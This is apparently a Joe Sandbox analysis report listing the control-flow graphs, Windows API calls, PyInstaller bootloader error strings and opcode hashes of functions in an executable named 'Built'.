                                                                      • Instruction ID: c99c8860e0fdac09ed77b146a73fd7f673d5fddab605377982c504a4ebb6e327
                                                                      • Opcode Fuzzy Hash: 4cb2c86178b2debc9d1438e34e60b398346cd33ecfd6192601395768889eb40b
                                                                      • Instruction Fuzzy Hash: 96F15921A2C786D1FB19FB21D5542B9A2A1AF58780FC4403ADE1D43A97FF2CE558CB70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 476 7ff76d5e5c74-7ff76d5e5ce7 call 7ff76d5e59a8 479 7ff76d5e5d01-7ff76d5e5d0b call 7ff76d5d7830 476->479 480 7ff76d5e5ce9-7ff76d5e5cf2 call 7ff76d5d43d4 476->480 485 7ff76d5e5d26-7ff76d5e5d8f CreateFileW 479->485 486 7ff76d5e5d0d-7ff76d5e5d24 call 7ff76d5d43d4 call 7ff76d5d43f4 479->486 487 7ff76d5e5cf5-7ff76d5e5cfc call 7ff76d5d43f4 480->487 489 7ff76d5e5d91-7ff76d5e5d97 485->489 490 7ff76d5e5e0c-7ff76d5e5e17 GetFileType 485->490 486->487 498 7ff76d5e6042-7ff76d5e6062 487->498 495 7ff76d5e5dd9-7ff76d5e5e07 GetLastError call 7ff76d5d4368 489->495 496 7ff76d5e5d99-7ff76d5e5d9d 489->496 492 7ff76d5e5e6a-7ff76d5e5e71 490->492 493 7ff76d5e5e19-7ff76d5e5e54 GetLastError call 7ff76d5d4368 CloseHandle 490->493 501 7ff76d5e5e73-7ff76d5e5e77 492->501 502 7ff76d5e5e79-7ff76d5e5e7c 492->502 493->487 510 7ff76d5e5e5a-7ff76d5e5e65 call 7ff76d5d43f4 493->510 495->487 496->495 503 7ff76d5e5d9f-7ff76d5e5dd7 CreateFileW 496->503 507 7ff76d5e5e82-7ff76d5e5ed7 call 7ff76d5d7748 501->507 502->507 508 7ff76d5e5e7e 502->508 503->490 503->495 515 7ff76d5e5ef6-7ff76d5e5f27 call 7ff76d5e5728 507->515 516 7ff76d5e5ed9-7ff76d5e5ee5 call 7ff76d5e5bb0 507->516 508->507 510->487 522 7ff76d5e5f2d-7ff76d5e5f6f 515->522 523 7ff76d5e5f29-7ff76d5e5f2b 515->523 516->515 521 7ff76d5e5ee7 516->521 524 7ff76d5e5ee9-7ff76d5e5ef1 call 7ff76d5d9dd0 521->524 525 7ff76d5e5f91-7ff76d5e5f9c 522->525 526 7ff76d5e5f71-7ff76d5e5f75 522->526 523->524 524->498 529 7ff76d5e6040 525->529 530 7ff76d5e5fa2-7ff76d5e5fa6 525->530 526->525 528 7ff76d5e5f77-7ff76d5e5f8c 526->528 528->525 529->498 530->529 532 7ff76d5e5fac-7ff76d5e5ff1 CloseHandle CreateFileW 530->532 533 7ff76d5e5ff3-7ff76d5e6021 GetLastError call 7ff76d5d4368 call 7ff76d5d7970 532->533 534 7ff76d5e6026-7ff76d5e603b 532->534 533->534 534->529
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0
                                                                      • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                      • Instruction ID: f4dcd9222a0f64b4a608c99ab80cf2d788be897eb611c508f1a7bb86715073c0
                                                                      • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                      • Instruction Fuzzy Hash: 94C1C336B28A45C6EB10EF68C4902BC7761FB49B98B811235DF2E57B96EF38D551C320
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2067671148.00007FFDFB899000.00000080.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB2C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2066264904.00007FFDFB2C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB2C1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB517000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB55A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB5D4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB616000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB63B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB6D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB6D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB7DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB820000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB82A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB84E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2066532868.00007FFDFB88D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067734508.00007FFDFB89B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdfb2c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007$E2167$E216804
                                                                      • String ID:
                                                                      • API String ID: 4134553183-0
                                                                      • Opcode ID: fdb599fc99c8fad1dcd8d64366f4a8b9e772c8d2446d19b2fbc340804334e0c3
                                                                      • Instruction ID: 25a286fbb67e989261d88c2a520b4dba501d5c9c9622d21570e5b709a78e0f6a
                                                                      • Opcode Fuzzy Hash: fdb599fc99c8fad1dcd8d64366f4a8b9e772c8d2446d19b2fbc340804334e0c3
                                                                      • Instruction Fuzzy Hash: C762162273919786EB158F38D45067D7B90F798B89F045132EAAEC37D8EA7CEA45C700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1150 7ff76d5c85a0-7ff76d5c85dd FindFirstFileExW 1151 7ff76d5c85df-7ff76d5c85f0 FindClose 1150->1151 1152 7ff76d5c8601 1150->1152 1151->1152 1153 7ff76d5c85f2-7ff76d5c85ff 1151->1153 1154 7ff76d5c8603-7ff76d5c861b call 7ff76d5cb870 1152->1154 1153->1154
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: [oV116
                                                                      • API String ID: 2295610775-247592185
                                                                      • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                      • Instruction ID: ec88b6fe75d1f8700bdab4c2eca9bc2c93fb35243e69a3d215c5a16718a7ef72
                                                                      • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                      • Instruction Fuzzy Hash: 33F0A422A2C741C6F760AF60B488366B350AB44328F840239DD7E02AD5EF3CD058CE14
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true
                                                                      • Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007$B434214
                                                                      • String ID:
                                                                      • API String ID: 2120276872-0
                                                                      • Opcode ID: 5512a1eabacbca0d3b8ad089bd680032222cc6725cd5df72e4646ec3e0e7399c
                                                                      • Instruction ID: 965d583e67f91c462ab9306704d5d33dd9989bab24a7ec27c0c7aef918639511
                                                                      • Opcode Fuzzy Hash: 5512a1eabacbca0d3b8ad089bd680032222cc6725cd5df72e4646ec3e0e7399c
                                                                      • Instruction Fuzzy Hash: 83611F31E0DE12C2EA55AF6399541396AA0BFD5BB0F0944B4DF0E877B2DE7DA405D340

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 179 7ff76d5c18f0-7ff76d5c192b call 7ff76d5c3f70 182 7ff76d5c1bc1-7ff76d5c1be5 call 7ff76d5cb870 179->182 183 7ff76d5c1931-7ff76d5c1971 call 7ff76d5c76a0 179->183 188 7ff76d5c1977-7ff76d5c1987 call 7ff76d5cf9f4 183->188 189 7ff76d5c1bae-7ff76d5c1bb1 call 7ff76d5cf36c 183->189 194 7ff76d5c19a1-7ff76d5c19bd call 7ff76d5cf6bc 188->194 195 7ff76d5c1989-7ff76d5c199c call 7ff76d5c2760 188->195 192 7ff76d5c1bb6-7ff76d5c1bbe 189->192 192->182 200 7ff76d5c19bf-7ff76d5c19d2 call 7ff76d5c2760 194->200 201 7ff76d5c19d7-7ff76d5c19ec call 7ff76d5d4154 194->201 195->189 200->189 206 7ff76d5c1a06-7ff76d5c1a87 call 7ff76d5c1bf0 * 2 call 7ff76d5cf9f4 201->206 207 7ff76d5c19ee-7ff76d5c1a01 call 7ff76d5c2760 201->207 215 7ff76d5c1a8c-7ff76d5c1a9f call 7ff76d5d4170 206->215 207->189 218 7ff76d5c1aa1-7ff76d5c1ab4 call 7ff76d5c2760 215->218 219 7ff76d5c1ab9-7ff76d5c1ad2 call 7ff76d5cf6bc 215->219 218->189 224 7ff76d5c1ad4-7ff76d5c1ae7 call 7ff76d5c2760 219->224 225 7ff76d5c1aec-7ff76d5c1b08 call 7ff76d5cf430 219->225 224->189 230 7ff76d5c1b0a-7ff76d5c1b16 call 7ff76d5c25f0 225->230 231 7ff76d5c1b1b-7ff76d5c1b29 225->231 230->189 231->189 233 7ff76d5c1b2f-7ff76d5c1b3e 231->233 235 7ff76d5c1b40-7ff76d5c1b46 233->235 236 7ff76d5c1b60-7ff76d5c1b6f 235->236 237 7ff76d5c1b48-7ff76d5c1b55 235->237 236->236 238 7ff76d5c1b71-7ff76d5c1b7a 236->238 237->238 239 7ff76d5c1b8f 238->239 240 7ff76d5c1b7c-7ff76d5c1b7f 238->240 241 7ff76d5c1b91-7ff76d5c1bac 239->241 240->239 242 7ff76d5c1b81-7ff76d5c1b84 240->242 241->189 241->235 242->239 243 7ff76d5c1b86-7ff76d5c1b89 242->243 243->239 244 7ff76d5c1b8b-7ff76d5c1b8d 243->244 244->241
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _fread_nolock$Message
                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$[oV116$calloc$fread$fseek$malloc
                                                                      • API String ID: 677216364-2761527484
                                                                      • Opcode ID: 717e2230fb4e802a6d52b38fb1cf44572713d61057fed9abe336daa52525497c
                                                                      • Instruction ID: af7b0739bf16475b14ff838075313ec0266d431c27592a6456d0ae0be2933662
                                                                      • Opcode Fuzzy Hash: 717e2230fb4e802a6d52b38fb1cf44572713d61057fed9abe336daa52525497c
                                                                      • Instruction Fuzzy Hash: 86719171A2C686C5EB20BB14D4506B9A3A1EB58788F845039ED8D47F9BFE2CE5448F70

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                      • API String ID: 2030045667-3659356012
                                                                      • Opcode ID: 6dafb8662994b8a1a37633b7f529fd21afb5c9cf46ec6f1b6d61c1ed785f845a
                                                                      • Instruction ID: e1090303b6d967d48e7ca4b378c5d5cbbde2134319f78b6b668c17c49713789e
                                                                      • Opcode Fuzzy Hash: 6dafb8662994b8a1a37633b7f529fd21afb5c9cf46ec6f1b6d61c1ed785f845a
                                                                      • Instruction Fuzzy Hash: 0E415C21B2C653C1EA20BB15A8505BAE3A0EB48B94F945036DE4E47E97FE3CE5418B20

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                      • API String ID: 2030045667-2813020118
                                                                      • Opcode ID: 3cb712157a06b071ee6466c04147966b809869f298c755cd6e6bffd2a969e137
                                                                      • Instruction ID: 287f446f9f77c864851de44c49c444a1c6a98fe4868331a5d6f310da19a87954
                                                                      • Opcode Fuzzy Hash: 3cb712157a06b071ee6466c04147966b809869f298c755cd6e6bffd2a969e137
                                                                      • Instruction Fuzzy Hash: EB51B462A2CA42C1EA60BB16A4507BAA291BF45798F844139DD4D47FD7FE3CE541CB30

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF76D5C3534), ref: 00007FF76D5C3411
                                                                        • Part of subcall function 00007FF76D5C29E0: GetLastError.KERNEL32(?,?,?,00007FF76D5C342E,?,00007FF76D5C3534), ref: 00007FF76D5C2A14
                                                                        • Part of subcall function 00007FF76D5C29E0: FormatMessageW.KERNEL32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2A7D
                                                                        • Part of subcall function 00007FF76D5C29E0: MessageBoxW.USER32(?,?,?,00007FF76D5C342E), ref: 00007FF76D5C2ACF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ErrorFileFormatLastModuleName
                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$[oV116$\\?\
                                                                      • API String ID: 517058245-1491725795
                                                                      • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                      • Instruction ID: 3e318591bf323d374e0c0ceccb56d2509de617ca72c216a2ffb406021f04854f
                                                                      • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                      • Instruction Fuzzy Hash: A3215161B2C646D1FA21BB24E8553B9A250BF58395FC0013ADE6D86DE7FF2CE5048B30

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 696 7ff76d5dad6c-7ff76d5dad92 697 7ff76d5dad94-7ff76d5dada8 call 7ff76d5d43d4 call 7ff76d5d43f4 696->697 698 7ff76d5dadad-7ff76d5dadb1 696->698 712 7ff76d5db19e 697->712 699 7ff76d5db187-7ff76d5db193 call 7ff76d5d43d4 call 7ff76d5d43f4 698->699 700 7ff76d5dadb7-7ff76d5dadbe 698->700 719 7ff76d5db199 call 7ff76d5d9bf0 699->719 700->699 702 7ff76d5dadc4-7ff76d5dadf2 700->702 702->699 706 7ff76d5dadf8-7ff76d5dadff 702->706 709 7ff76d5dae01-7ff76d5dae13 call 7ff76d5d43d4 call 7ff76d5d43f4 706->709 710 7ff76d5dae18-7ff76d5dae1b 706->710 709->719 715 7ff76d5db183-7ff76d5db185 710->715 716 7ff76d5dae21-7ff76d5dae27 710->716 717 7ff76d5db1a1-7ff76d5db1b8 712->717 715->717 716->715 720 7ff76d5dae2d-7ff76d5dae30 716->720 719->712 720->709 723 7ff76d5dae32-7ff76d5dae57 720->723 725 7ff76d5dae8a-7ff76d5dae91 723->725 726 7ff76d5dae59-7ff76d5dae5b 723->726 729 7ff76d5dae93-7ff76d5dae9f call 7ff76d5dc90c 725->729 730 7ff76d5dae66-7ff76d5dae7d call 7ff76d5d43d4 call 7ff76d5d43f4 call 7ff76d5d9bf0 725->730 727 7ff76d5dae82-7ff76d5dae88 726->727 728 7ff76d5dae5d-7ff76d5dae64 726->728 732 7ff76d5daf08-7ff76d5daf1f 727->732 728->727 728->730 737 7ff76d5daea4-7ff76d5daebb call 7ff76d5d9c58 * 2 729->737 760 7ff76d5db010 730->760 735 7ff76d5daf21-7ff76d5daf29 732->735 736 7ff76d5daf9a-7ff76d5dafa4 call 7ff76d5e2c2c 732->736 735->736 740 7ff76d5daf2b-7ff76d5daf2d 735->740 747 7ff76d5db02e 736->747 748 7ff76d5dafaa-7ff76d5dafbf 736->748 756 7ff76d5daebd-7ff76d5daed3 call 7ff76d5d43f4 call 7ff76d5d43d4 737->756 757 7ff76d5daed8-7ff76d5daf03 call 7ff76d5db594 737->757 740->736 744 7ff76d5daf2f-7ff76d5daf45 740->744 744->736 749 7ff76d5daf47-7ff76d5daf53 744->749 752 7ff76d5db033-7ff76d5db053 ReadFile 747->752 748->747 754 7ff76d5dafc1-7ff76d5dafd3 GetConsoleMode 748->754 749->736 755 7ff76d5daf55-7ff76d5daf57 749->755 758 7ff76d5db14d-7ff76d5db156 GetLastError 752->758 759 7ff76d5db059-7ff76d5db061 752->759 754->747 761 7ff76d5dafd5-7ff76d5dafdd 754->761 755->736 762 7ff76d5daf59-7ff76d5daf71 755->762 756->760 757->732 768 7ff76d5db173-7ff76d5db176 758->768 769 7ff76d5db158-7ff76d5db16e call 7ff76d5d43f4 call 7ff76d5d43d4 758->769 759->758 765 7ff76d5db067 759->765 770 7ff76d5db013-7ff76d5db01d call 7ff76d5d9c58 760->770 761->752 767 7ff76d5dafdf-7ff76d5db001 ReadConsoleW 761->767 762->736 763 7ff76d5daf73-7ff76d5daf7f 762->763 763->736 771 7ff76d5daf81-7ff76d5daf83 763->771 775 7ff76d5db06e-7ff76d5db083 765->775 777 7ff76d5db003 GetLastError 767->777 778 7ff76d5db022-7ff76d5db02c 767->778 772 7ff76d5db17c-7ff76d5db17e 768->772 773 7ff76d5db009-7ff76d5db00b call 7ff76d5d4368 768->773 769->760 770->717 771->736 782 7ff76d5daf85-7ff76d5daf95 771->782 772->770 773->760 775->770 784 7ff76d5db085-7ff76d5db090 775->784 777->773 778->775 782->736 788 7ff76d5db092-7ff76d5db0ab call 7ff76d5da984 784->788 789 7ff76d5db0b7-7ff76d5db0bf 784->789 796 7ff76d5db0b0-7ff76d5db0b2 788->796 793 7ff76d5db0c1-7ff76d5db0d3 789->793 794 7ff76d5db13b-7ff76d5db148 call 7ff76d5da7c4 789->794 797 7ff76d5db0d5 793->797 798 7ff76d5db12e-7ff76d5db136 793->798 794->796 796->770 800 7ff76d5db0da-7ff76d5db0e1 797->800 798->770 801 7ff76d5db0e3-7ff76d5db0e7 800->801 802 7ff76d5db11d-7ff76d5db128 800->802 803 7ff76d5db103 801->803 804 7ff76d5db0e9-7ff76d5db0f0 801->804 802->798 806 7ff76d5db109-7ff76d5db119 803->806 804->803 805 7ff76d5db0f2-7ff76d5db0f6 804->805 805->803 807 7ff76d5db0f8-7ff76d5db101 805->807 806->800 808 7ff76d5db11b 806->808 807->806 808->798
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                                      • Instruction ID: aafb22e96dce284fa08566b45f0ed1a251ad769c013d0808e08d1a3ce162d628
                                                                      • Opcode Fuzzy Hash: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                                      • Instruction Fuzzy Hash: B5C1E22292C787D1EB61BB5490206BEB761EB94BC0F950131DE6D03B93EE7CE4458338

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1279662727-0
                                                                      • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                      • Instruction ID: b2ddc5d05920a2b1e720d7c39f6b679bb479ad9be51ccdb2a1caf50ed151d5a5
                                                                      • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                      • Instruction Fuzzy Hash: 6541A622D2C78283E714AF219520379A251FB98764F509334EEAC03ED6EF7CA1E08724
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 3251591375-0
                                                                      • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                      • Instruction ID: 1d15394fc232dadb7ac95c06d78cbbb7b2f5d2f9e0a05e88802c2c47313d61a7
                                                                      • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
